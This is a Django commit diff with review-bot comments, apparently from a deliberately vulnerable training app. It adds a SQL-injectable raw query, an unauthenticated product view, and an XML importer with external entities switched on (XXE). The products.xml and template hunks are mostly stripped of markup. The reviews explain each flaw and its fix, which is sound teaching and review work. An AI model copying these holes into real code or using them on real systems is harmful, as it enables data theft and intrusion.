diff --git a/project1/project1/settings.py b/project1/project1/settings.py
index 3a10ff9..449cc3f 100644
--- a/project1/project1/settings.py
+++ b/project1/project1/settings.py
@@ -53,6 +53,8 @@ MIDDLEWARE = [
ROOT_URLCONF = 'project1.urls'
+STATICFILES_DIRS = ["static"]
+
TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
TEMPLATES = [
{
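Review bot: `STATICFILES_DIRS = ["static"]` on the added line is a relative path, so the static finder resolves it against the server process's current working directory rather than the project and silently finds nothing when the app is started from elsewhere. The line just below already derives `TEMPLATE_DIR` from `BASE_DIR`; the same form keeps the two settings consistent: `STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]`. Anything placed in that directory — this commit adds `static/products.xml` to it — is collected and served as a public asset, so it should only hold files that are meant to be public.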
diff --git a/project1/project1/urls.py b/project1/project1/urls.py
index 53af268..31f7e8e 100644
--- a/project1/project1/urls.py
+++ b/project1/project1/urls.py
@@ -14,18 +14,17 @@ Including another URLconf
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin, auth
-from django.urls import path, include
+from django.urls import path,re_path,include
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
- path('', views.home),
-
- path('find_product', views.find_product),
+
path('login', views.login),
path('do_login', views.do_login),
path('logout', views.logout),
+ path('', views.home),
+
path('add_product', views.add_product),
path('import_products', views.import_products)
-
]
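Review bot: `re_path` is added to the import on the changed line but nothing in the visible `urlpatterns` uses it — every entry is a plain `path(...)` — so either drop it or add the route it was meant for; PEP 8 spacing would be `from django.urls import path, re_path, include`. The only pattern that went away is `find_product`, and moving `path('', views.home)` below the login routes changes nothing since `''` only matches the empty path. The `auth` name on the unchanged `django.contrib` import above is likewise unused in this file's URL config.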
diff --git a/project1/project1/views.py b/project1/project1/views.py
index 8a6d6ce..081c11d 100644
--- a/project1/project1/views.py
+++ b/project1/project1/views.py
@@ -4,10 +4,29 @@ from project1.models import Product
from django.contrib import auth
from django.contrib.auth.decorators import login_required
from django import forms
+from xml.dom import pulldom
+from xml.dom.pulldom import parse
+from xml.sax import make_parser
+from xml.sax.handler import feature_external_ges, feature_external_pes
+
+# https://docs.python.org/3/library/xml.dom.pulldom.html#module-xml.dom.pulldom
+
+def home(request):
+ filter = request.GET.get('filter', '')
+ if filter == '':
+ return all_products(request)
+ else:
+ return filtered_products(request)
@login_required(login_url='/login')
-def home(request):
- return render(request, "index.html")
+def all_products(request):
+ products = Product.objects.all()
+ return render(request, "index.html", {"products": products})
+
+def filtered_products(request):
+ filter = request.GET.get('filter', '')
+ products = Product.objects.raw("SELECT * FROM project1_Product where name like '%" + filter + "%'")
+ return render(request, "index.html", {"products": products})
def login(request):
return render(request, 'login.html')
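Review bot: The new `filtered_products` carries no `@login_required` and splices the `filter` query parameter straight into a raw SQL string, and the new `home` sends every request with a non-empty `?filter=` to it, so an unauthenticated caller can both list products and inject SQL through `filter` (a `'` in the value closes the LIKE literal). The template text elsewhere in this commit advertises the missing login check as a deliberate broken-access-control exercise, but unless the injection is also intended, bind the pattern as a parameter: `products = Product.objects.raw("SELECT * FROM project1_Product WHERE name LIKE %s", ["%" + filter + "%"])`, and if the bypass is not intended add `@login_required(login_url='/login')` to `filtered_products` (or to `home`) as `all_products` has. `filter` also shadows the builtin — `query` reads better — and the three new top-level defs need two blank lines between them under PEP 8. The bare doc URL comment above `home` would be more useful if it said why it is there, e.g. `# pulldom is used for streaming import; see that page's security note on xml parsers`.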
@@ -31,23 +50,27 @@ def add_product(request):
name = request.POST.get('name', '')
product = Product.objects.create(name=name)
print('Added product ' + product.name)
- return HttpResponse(content='Saved product ' + product.name)
-
-def find_product(request):
- search = request.GET.get('name', '')
- print('Searching for ' + search)
- products = Product.objects.raw(
- "SELECT * FROM project1_Product where name like '%" + search + "%'")
- return HttpResponse("
".join(map(lambda p: p.name, products)))
+ return HttpResponseRedirect('/')
@login_required(login_url='/login')
def import_products(request):
form = UploadFileForm(request.POST, request.FILES)
if form.is_valid():
file = request.FILES['file']
+ parser = make_parser()
+ parser.setFeature(feature_external_ges, True)
+ doc = parse(file, parser=parser)
+ for event, node in doc:
+ if event == pulldom.START_ELEMENT and node.tagName == 'product':
+ doc.expandNode(node)
+ name = node.firstChild.wholeText
+ product = Product.objects.create(name=name)
+ print("Added product ", name)
+
return HttpResponseRedirect('/')
else:
return HttpResponse(content="Upload failed.")
class UploadFileForm(forms.Form):
- file = forms.FileField()
\ No newline at end of file
+ file = forms.FileField()
+
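Review bot: `parser.setFeature(feature_external_ges, True)` in `import_products` switches on external general entity resolution — off by default in the stdlib SAX parser — for a file the user just uploaded, so a `<!ENTITY x SYSTEM "file:///...">` or `http://...` entity declared in the upload is fetched by the server and its content is stored as product names via `Product.objects.create`, presumably rendered back on `/` by `index.html` (XXE with in-band readback). If that is not a deliberate lab weakness, drop the line or pin it off: `parser.setFeature(feature_external_ges, False)`; `feature_external_pes` is imported but never set, so set it `False` as well or remove the import. Separately, `node.firstChild.wholeText` raises `AttributeError` on an empty `<product/>` (`firstChild` is `None`) or when the first child is an element rather than text, surfacing as a 500 after earlier products in the same file were already created; guard with `if node.firstChild is None: continue` before reading `wholeText`. `add_product`, whose tail opens this hunk, begins outside it.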
diff --git a/project1/static/products.xml b/project1/static/products.xml
new file mode 100644
index 0000000..a114986
--- /dev/null
+++ b/project1/static/products.xml
@@ -0,0 +1,10 @@
+
+
+]>
+
+
-
@@ -25,6 +35,7 @@
+ Want to abuse the broken access control vulnerability and view all products without logging in? Click here +